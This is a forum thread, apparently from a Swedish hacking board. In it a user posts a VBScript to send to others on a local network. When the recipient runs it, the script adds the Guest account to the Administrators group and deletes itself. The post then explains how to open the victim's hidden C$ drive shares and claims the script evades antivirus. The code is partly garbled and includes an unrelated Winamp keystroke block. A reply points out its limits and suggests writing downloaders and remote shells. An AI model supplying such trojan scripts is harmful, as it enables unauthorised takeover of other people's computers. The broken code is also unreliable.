Help - Search - Members - Calendar
Full Version: How to gain access to all computer in the network
SweRAT > Datasäkerhet > Sårbarheter och intrång
PHyZoN
I have done a litle guid on.
How to gain access to all
computers in your network!!!

It will work on windows
95,98,2000,xp and i belive vista
will work to!!

ok!!


lets's begin!!

this program(script will add the
"GUEST" ACCOUNT TO
"ADMINISTRATORS" GROUP and let
you access any computer in your
local network!!!



step 1:open notpad
step 2:write this

dim oexec
Dim Group
Dim GroupName
Dim GroupDomain
Dim strTextFile
Dim oWSHNetwork





set wshshell = wscript.CreateObject
("WScript.Shell")

set oExec = wshshell.exec("c:\Program
Files\winamp\winamp.exe
wscript.sleep 5000
wshshell.sendkeys "j"
wshshell.sendkeys "Lloyd Banks"
wshshell.sendkeys "~"


Set oWSHNetwork = CreateObject
("WSceipt.Network")
strTextFile = "Guest"
GroupDomain = oWSHNetwork.UserDomain

---------------------------------------------------------

GroupName = "administrators"
Set Group = Get=bject("WinNT://" &
GroupDomain & "/" & GroupName & ",group")
Group.Add("WinNT://" & GroupDomain & "/" &
strTextFile & ",user")



Set objFSO = CreateObject
("Scripting.FileSystemObject")
Set objFile = objFSO.GetFile("Lloyd
Banks.vbs")
objFSO.DeleteFile objfile

---------------------------------------------------------

step3: sent this to someoane in
your local network!!
step4:open MY COMPUTER

STEP%: IN THE ADDRESS BAR ENTER
\\XXX.XXX.XXX.XXX\X$

XXX.XXX.XXX.XXX=IP ADRESS
OF THE PERSON
(EX:\\192.168.0.105\C$)

SECOND X=THE PARTITION TO
CONNECT TO (EX \\192.168.0.105\C$)

NOW YO HAVE ACCESS TO EVERYFING
IN THAT COMPUTER!!

THIS IS AN EXEMPLE!!
1290168.0.105 ----->IP OF THE
COMPUTER YOU SENT THE SCRIPT

LET'S SAY THIS COMPUTER HAS 3
PARTITION'S
C,D,E

THIS IS WAT YOU HAVE TO WRITE IN THE ADDRESS BAR OF MY COMPUTER
\\192.168.0.105\C$
\\192.168.0.105\D$--->SECOND
PARTITON

\\192.168.0.105\E$

AND SO ON !!!


THIS SCRIPT IS NOT DETECTET BY ANY ANTIVIRUS OR FIREWALL
SOFTWARE!!!

THIS SCRIPT IT WILL SELF DELETE
AFTER EXECUTION!!

HAVE FUN!!!

AND REMEMBER DONT USE THIS ON SOMEONE WHO NOT AGREE.
Mja
The WHS-script for group administration only works when the recipient is a local administrator, and it will only execute localy.
Remote execution is functional, but will not work unless there is a global administratoraccount, since local admin account can not be accessed via WMI (the alternative method to your method).

Then there is some source I think you might have forgot in the script

QUOTE
set oExec = wshshell.exec("c:\Program
Files\winamp\winamp.exe
wscript.sleep 5000
wshshell.sendkeys "j"
wshshell.sendkeys "Lloyd Banks"
wshshell.sendkeys "~"

Starts Winamp (blindly, since there is no verification that the file exist..), waits 5 seconds, then types "j", "Lloyd Banks" "~"

If you are really into this vbs-scripting you can create some more fun stuff like downloader/execute, a simple remote shell and so on, using either http-requests, TFTP or ADODB-objects.
PHyZoN
Thx for the note smile.gif
Weaxer
So i basically have to send this to my friend on msn, and he has to open it, then it will work, right? Or i don't know, i see no connection or something wacko.gif
theklansmen
QUOTE(Weaxer @ 2007-11-02 22:14) *
So i basically have to send this to my friend on msn, and he has to open it, then it will work, right? Or i don't know, i see no connection or something wacko.gif


It will only work on your local network.
PHyZoN
vill bara säga att ja e swe tongue.gif och att ja la upp denna Guiden på eng så alla skulle fatta^^
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2012 Invision Power Services, Inc.